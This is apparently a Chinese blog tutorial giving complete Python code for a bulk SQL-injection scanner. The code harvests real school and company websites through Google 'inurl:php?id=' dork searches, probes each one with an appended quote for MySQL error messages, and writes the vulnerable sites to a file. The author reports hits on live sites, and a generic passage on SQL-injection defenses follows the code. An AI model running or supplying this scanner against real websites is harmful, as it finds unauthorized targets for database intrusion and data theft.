SQL注入漏洞批量扫描器



概述

  整体思路:
1.调用Google批量搜索;
2.筛选出相关网站链接;
3.拿到链接后,对单页面进行SQL注入的参数探测
4.输出探测结果。



1. 调用谷歌进行批量搜索

	测试:
# 开启HTTP代理,成功访问代码:print(requests.get("https://www.google.com.hk/search?q=中国").text)
# 成功访问代码:print(requests.get("https://www.google.com.hk/search?q=inurl:php?id= 学校").text)

	代码,成功返回Google搜索结果:
url = "https://www.google.com.hk/search?q=inurl:php?id= 学校"
res = requests.get(url)
html = res.text

  代理不稳定时,Python可能会报错,再次执行py文件即可:

  requests.exceptions.ProxyError: HTTPSConnectionPool(host=‘www.google.com.hk’, port=443): Max retries exceeded with url: /search?q=inurl:php?id=%20%E5%AD%A6%E6%A0%A1 (Caused by ProxyError(‘Cannot connect to proxy.’, OSError(0, ‘Error’)))



2. 筛选相关网站链接

  查看Google搜索结果网页的前端代码,找到某个相关网站的超链接:

在这里插入图片描述

  使用bs4解析库,发现得到的网站链接格式是/url?q=httpxxx&sa=x&ved=x&usg=x。
依据这个格式把查询到的网站筛选出来,定位http和&进行截取。

在这里插入图片描述

	代码:
soup = BeautifulSoup(html, 'lxml')
tags = soup.select("a")
for tag in tags:
    href = tag.get("href")
    if(("http" in href) and ("google" not in href)):
        url = href[href.find("http"):]
        url = url[:url.find("&")]   # 得到第一页的10个网站,例如http://www.shenghuaedu.com/about.php%3Fid%3D41,
        url = urllib.parse.unquote(url)	# python或直接访问会返回404,需要url解码
        # print(url)
        SqlPoc(url)


3.SQL注入漏洞探测

	
def SqlPoc(url):
    res = requests.get(url+"'")
    if("MySQL" in res.text):
        print("最后一个get参数存在报错注入:" + url)

  执行效果:
在这里插入图片描述

补充

问题1:访问Google前10页搜索结果。

  Google直接返回的页面是第一页,只有10条记录。访问后,Google会添加一些参数。通过对比前三页的URL地址,发现区别在于start=n*10, 其中n是自然数。

  对第一页网址进行URL解码:https://www.google.com.hk/search?q=inurl:php?id= 学校&newwindow=1&safe=strict&ei=CvlvYNOaJZeKr7wPxMussAM&start=0&sa=N&ved=2ahUKEwjTx8iOyfDvAhUXxYsBHcQlCzY4ChDy0wN6BAgBEDE&biw=1536&bih=750

  对第二页网址进行URL解码:https://www.google.com.hk/search?q=inurl:php?id= 学校&newwindow=1&safe=strict&ei=-vVvYI2qL9LFmAW1zJLYCQ&start=10&sa=N&ved=2ahUKEwiNj-eYxvDvAhXSIqYKHTWmBJsQ8tMDegQIARAy&biw=1536&bih=750

  通过python能否获取当前页面的完整网址?
通过res.响应头找到res.url方法,但得到的是访问的url。

  通过前端代码得到前10页查询结果的网址,因为第1页只显示前10页,或前8页。
根据关键词“start=”来定位,只返回了第二页的链接。复制response到notepad++,
查找"start=0/90",发现确实没有其它页的链接,这跟看到的前端源码不相符。

  解决办法:Google防爬虫技术,为请求头添加User-Agent信息可以解决问题。

	传入Google查询搜索URL地址,筛选出前10页,发现只返回了2-9页的地址。
	把每页的查询结果传递给Current_Page(),爬取每页的相关网站。
def TenPage(url_query):
    headers = {
            "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
    }
    res = requests.get(url, headers=headers)
    html = res.text
    #print(html)
    soup = BeautifulSoup(html, 'lxml')
    tags = soup.select("a")
    for tag in tags:
        href = tag.get("href")
        if(href != None):
            if("start" in href):
                Current_Page("https://www.google.com.hk" + href)
                #print(href)
问题2:异常处理

  测试100个网站,总会有访问错误的情况发生,要想让程序继续执行,必须捕获异常。

def SqlPoc(): # 10页搜索结果
    count = 0
    with open("query_site.txt", "r") as f:
        for each_line in f:
            url = each_line[:each_line.find("\n")]
            count = count + 1
            if(count%10 == 0):
                print(count)
            try:
                res = requests.get(url+"'", timeout=3)	# 等待时间超过3秒即抛弃
                if ("MySQL" in res.text):
                    print("最后一个get参数存在报错注入:" + url)
            except:
                continue
    print(count)
    f.close()
问题3:扫描效果差

  设置等待3秒就放弃访问,捕获异常,然后扫描2-9页只探测到一个网站的漏洞。
不知道是网速或代理的问题,还是SQL报错注入确实比较少。



完整代码

扫描Google搜索结果的第一页网站

  代码执行效果(日本代理速度真快):

在这里插入图片描述

  全部代码:

import requests
import urllib
from bs4 import BeautifulSoup

def Current_Page(url):
    res = requests.get(url)
    html = res.text
    #print(html)


    soup = BeautifulSoup(html, 'lxml')
    tags = soup.select("a")
    for tag in tags:
        href = tag.get("href")
        if(("http" in href) and ("google" not in href)):
            url = href[href.find("http"):]
            url = url[:url.find("&")]   # 得到10网站,例如http://www.shenghuaedu.com/about.php%3Fid%3D41,python或直接访问会返回404,需要url解码
            url = urllib.parse.unquote(url)
            SqlPoc(url)
            #print(url)
            #url_list.append(url)


def SqlPoc(url):
    res = requests.get(url + "'")
    if ("MySQL" in res.text):
        print("最后一个get参数存在报错注入:" + url)
   
url_query = "https://www.google.com.hk/search?q=inurl:php?id= 学校"
Current_Page(url_query)


扫描Google搜索结果的前10页网站

  查询语法很重要,输入“学校”几乎没有探测到漏洞,输入“企业”就探测到多个站点。

  执行效果:

在这里插入图片描述

  全部代码

import requests
import urllib
from bs4 import BeautifulSoup

url_query = "https://www.google.com.hk/search?q=inurl:php?id= 企业"
google_list = []
site_list = []

count = 0

def Current_Page(google_list):
    for url in google_list:
        res = requests.get(url)
        html = res.text
    #print(html)

        soup = BeautifulSoup(html, 'lxml')
        tags = soup.select("a")
        for tag in tags:
            href = tag.get("href")
            if(("http" in href) and ("google" not in href)):
                url = href[href.find("http"):]
                url = url[:url.find("&")]   # 得到10网站,例如http://www.shenghuaedu.com/about.php%3Fid%3D41,python或直接访问会返回404,需要url解码
                url = urllib.parse.unquote(url)
                IsUnique(site_list, url)


def SqlPoc(site_list, count): # 10页搜索结果
    for url in site_list:
        print("第%d个网站"%count , end="   ")
        count = count + 1
        try:
            res = requests.get(url+"'", timeout=5)
            if ("MySQL" in res.text):
                print()
                print("最后一个get参数存在报错注入:" + url)
                WriteLeak(url)
            # else:
            #     print("不存在报错注入" + url + "     ", end="")
        except:
            print("连接异常:" + url, end="   ")


def TenPage(url):
    headers = {
            "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
    }
    res = requests.get(url, headers=headers)
    html = res.text
    #print(html)
    soup = BeautifulSoup(html, 'lxml')
    tags = soup.select("a")
    for tag in tags:
        href = tag.get("href")
        if(href != None):
            if("start" in href):
                # print(href)
                google_query = "https://www.google.com.hk" + href
                IsUnique(google_list, google_query)


def WriteSite(site_list):
    with open("query_site.txt", "w+") as f:
        for x in site_list:
            f.write(x + "\n")
    f.close()


def WriteLeak(url):
    with open("leak_site.txt", "a+") as f:
        f.write(url + "\n")
    f.close()


def IsUnique(list1, element):
    if(element not in list1):
        list1.append(element)


TenPage(url_query)
Current_Page(google_list)
WriteSite(site_list)

SqlPoc(site_list,count)
print()
print("查询结果页数量:%d"%(len(google_list)-1))
print("去重后网站数量:%d"%len(site_list))

参考

  《AttributeError: module ‘urllib’ has no attribute 'quote’的解决办法》,2020-02
https://blog.csdn.net/weixin_41597019/article/details/104150737

  《Python:打开文件读取每一行(使用with as)》,2017-08
www.tkvs.ylc.edu.tw

  《python中的程序中断、for循环和while循环》,2019-06
https://blog.csdn.net/weixin_44889616/article/details/93667145

  • 1
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
SQL注入漏洞挖掘实战是指通过利用SQL注入漏洞漏洞挖掘活动。SQL注入漏洞是一种常见的数据库攻击手段,用于利用应用程序对用户输入的SQL语句进行不当处理,从而导致恶意用户可以执行未经授权的数据库操作。这些操作包括读取、修改或删除数据库中的数据。 在SQL注入漏洞挖掘实战中,黑客通常会尝试通过构造特定的SQL语句来绕过应用程序的输入验证和过滤机制,以获取敏感信息或对数据库进行恶意操作。他们可能会使用各种技术和工具来自动化这个过程,并尝试发现和利用潜在的SQL注入漏洞。 为了防止SQL注入漏洞挖掘实战,开发人员应该采取以下措施: 1. 输入验证和过滤: 应用程序应该对用户输入进行严格的验证和过滤,确保只允许合法的字符和格式。使用参数化查询或预编译语句可以有效预防SQL注入攻击。 2. 最小权限原则: 数据库用户应该被授予最低权限,以限制对数据库的访问和操作。这样即使发生SQL注入攻击,黑客也只能执行有限的操作。 3. 安全编码实践: 开发人员应该熟悉安全编码实践,并使用安全的API和框架来构建应用程序。避免将用户输入直接拼接到SQL查询中,而是使用参数化查询或预编译语句。 4. 定期漏洞扫描和安全测试: 定期进行漏洞扫描和安全测试,以发现和修复潜在的SQL注入漏洞。这可以帮助及早发现和解决问题,确保应用程序的安全性。 总结起来,SQL注入漏洞挖掘实战是黑客利用SQL注入漏洞进行恶意攻击的活动。为了防止这种漏洞的利用,开发人员需要采取一系列安全措施,包括输入验证和过滤、最小权限原则、安全编码实践和定期漏洞扫描和安全测试。这些措施可以帮助保护应用程序免受SQL注入漏洞的威胁。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [SQL注入攻击实战演示(附源码)](https://blog.csdn.net/hack0919/article/details/129880265)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值